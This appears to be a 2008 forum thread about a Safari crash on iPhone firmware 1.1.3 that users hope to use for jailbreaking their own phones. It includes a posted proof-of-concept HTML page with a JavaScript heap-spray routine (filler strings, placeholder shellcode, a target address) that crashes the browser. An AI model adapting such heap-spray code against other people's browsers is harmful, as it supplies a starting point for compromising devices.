Anyone saw this:
http://www.iphoneworld.ca/news/2008/...le-ipod-touch/
I tested it with my own webserver and it crashes my iphone.
Printable View
Anyone saw this:
http://www.iphoneworld.ca/news/2008/...le-ipod-touch/
I tested it with my own webserver and it crashes my iphone.
did your iphone recover normally again?
nice exploit:cool:
Yes.
It freeze up and reboot after some time to a normal state.
My Phone is at 1.1.3
rock on...
thanks for the news
ok thread closed...hehe :cool:
Anyone here who can explain me how jailbreakme.com or i.unlock.no works?
If so, i will bring up a website with the new exploit to jailbreak all versions include 1.1.3 via safari...
how come expolits that crash the phone can be so helpful?
Basically why is a crashed phone good for jailbreaking etc?
because most crashes are caused by buffer overruns, and why does buffer overrun leads to getting control of the phone - is a long topic better be researched by typing "buffer overrun exploit article" in google
Here is the crash code:
Quote:
<html><body><script>
function Demo() {
var shellcode;
var addr;
var fill;
alert('attempting a crash!');
shellcode = unescape('ఌ');
fill = unescape('쳌');
addr = 0x02020202;
var b = fill;
while (b.length <= 0x40000) b+=b;
var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}
}
</script>
<input type='button' onClick='Demo()' value='Go!'>
</body></html>
NICE!!!!!!, we don't need to do soft upgrade soon then. :cool:
prep -> upragde thru itune to 1.1.3 -> expolit to put installer -> geo unlock!! best combination.